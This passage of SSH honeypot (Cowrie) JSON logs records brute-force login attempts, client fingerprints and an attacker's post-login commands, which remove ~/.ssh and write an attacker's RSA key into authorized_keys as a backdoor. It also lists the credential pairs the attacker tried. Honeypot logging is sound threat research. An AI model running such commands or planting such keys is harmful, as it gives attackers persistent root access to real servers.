","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:08:58.505927Z","src_ip":"212.227.235.229","session":"ee4e83bfe9b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:08:58.531995Z","session":"da90afe65f78"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:08:58.792136Z","src_ip":"212.227.235.229","session":"da90afe65f78"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:08:59.050771Z","src_ip":"212.227.235.229","session":"da90afe65f78"}
{"eventid":"cowrie.login.failed","username":"tars","password":"tars","message":"login attempt [tars/tars] failed","sensor":"my-vps","timestamp":"2025-08-26T04:08:59.638565Z","src_ip":"212.227.235.229","session":"ee4e83bfe9b3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"trustix","message":"login attempt [admin/trustix] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:00.719403Z","src_ip":"212.227.235.229","session":"d140cbb1e796"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:00.914969Z","src_ip":"212.227.235.229","session":"ee4e83bfe9b3"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:01.995620Z","src_ip":"212.227.235.229","session":"d140cbb1e796"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59462,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e0f810f8001","protocol":"ssh","message":"New connection: 212.227.235.229:59462 (1.2.3.4:22) [session: 5e0f810f8001]","sensor":"my-vps","timestamp":"2025-08-26T04:09:08.988063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:08.999003Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:09.241317Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.login.success","username":"root","password":"qqqqqq","message":"login attempt [root/qqqqqq] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:09:10.206012Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:09:10.753029Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:09:10.753802Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:09:10.754978Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:11.001892Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:09:11.509501Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:09:11.510231Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:09:11.757855Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:11.758757Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60156,"dst_ip":"1.2.3.4","dst_port":22,"session":"01f7756d51c6","protocol":"ssh","message":"New connection: 212.227.235.229:60156 (1.2.3.4:22) [session: 01f7756d51c6]","sensor":"my-vps","timestamp":"2025-08-26T04:09:11.991019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:11.998938Z","src_ip":"212.227.235.229","session":"01f7756d51c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:12.244347Z","src_ip":"212.227.235.229","session":"01f7756d51c6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:13.210036Z","src_ip":"212.227.235.229","session":"01f7756d51c6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:14.460580Z","src_ip":"212.227.235.229","session":"01f7756d51c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60874,"dst_ip":"1.2.3.4","dst_port":22,"session":"8da3f700c14a","protocol":"ssh","message":"New connection: 212.227.235.229:60874 (1.2.3.4:22) [session: 8da3f700c14a]","sensor":"my-vps","timestamp":"2025-08-26T04:09:14.694254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:14.697252Z","src_ip":"212.227.235.229","session":"8da3f700c14a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:14.950367Z","src_ip":"212.227.235.229","session":"8da3f700c14a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:09:15.930150Z","src_ip":"212.227.235.229","session":"8da3f700c14a"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:16.172089Z","src_ip":"212.227.235.229","session":"5e0f810f8001"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:16.173592Z","src_ip":"212.227.235.229","session":"8da3f700c14a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52554,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbe753724126","protocol":"ssh","message":"New connection: 212.227.235.229:52554 (1.2.3.4:22) [session: fbe753724126]","sensor":"my-vps","timestamp":"2025-08-26T04:09:21.349384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:09:21.401170Z","src_ip":"212.227.235.229","session":"fbe753724126"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:09:21.779335Z","src_ip":"212.227.235.229","session":"fbe753724126"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":38850,"dst_ip":"1.2.3.4","dst_port":22,"session":"7daf9bdb8973","protocol":"ssh","message":"New connection: 103.217.145.104:38850 (1.2.3.4:22) [session: 7daf9bdb8973]","sensor":"my-vps","timestamp":"2025-08-26T04:09:22.414041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:22.414785Z","src_ip":"103.217.145.104","session":"7daf9bdb8973"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:22.936756Z","src_ip":"212.227.235.229","session":"fbe753724126"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:09:23.017349Z","src_ip":"103.217.145.104","session":"7daf9bdb8973"}
{"eventid":"cowrie.login.failed","username":"tcuser","password":"tcuser123","message":"login attempt [tcuser/tcuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:24.106047Z","src_ip":"103.217.145.104","session":"7daf9bdb8973"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:24.393944Z","src_ip":"212.227.235.229","session":"fbe753724126"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:25.368764Z","src_ip":"103.217.145.104","session":"7daf9bdb8973"}
{"eventid":"cowrie.session.closed","duration":"90.3","message":"Connection lost after 90.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:28.472997Z","src_ip":"212.227.235.229","session":"b1fa53b594ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38614,"dst_ip":"1.2.3.4","dst_port":22,"session":"84770f59f9bf","protocol":"ssh","message":"New connection: 212.227.235.229:38614 (1.2.3.4:22) [session: 84770f59f9bf]","sensor":"my-vps","timestamp":"2025-08-26T04:09:34.039021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:09:34.454764Z","src_ip":"212.227.235.229","session":"84770f59f9bf"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:09:34.632995Z","src_ip":"212.227.235.229","session":"84770f59f9bf"}
{"eventid":"cowrie.login.failed","username":"test","password":"admin","message":"login attempt [test/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:36.099518Z","src_ip":"212.227.235.229","session":"84770f59f9bf"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:37.573024Z","src_ip":"212.227.235.229","session":"84770f59f9bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45546,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ecdea19b6ed","protocol":"ssh","message":"New connection: 212.227.235.229:45546 (1.2.3.4:22) [session: 7ecdea19b6ed]","sensor":"my-vps","timestamp":"2025-08-26T04:09:39.593907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:09:39.615543Z","src_ip":"212.227.235.229","session":"7ecdea19b6ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58448,"dst_ip":"1.2.3.4","dst_port":22,"session":"2741e71c6fb1","protocol":"ssh","message":"New connection: 212.227.235.229:58448 (1.2.3.4:22) [session: 2741e71c6fb1]","sensor":"my-vps","timestamp":"2025-08-26T04:09:39.830962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:09:39.831954Z","src_ip":"212.227.235.229","session":"2741e71c6fb1"}
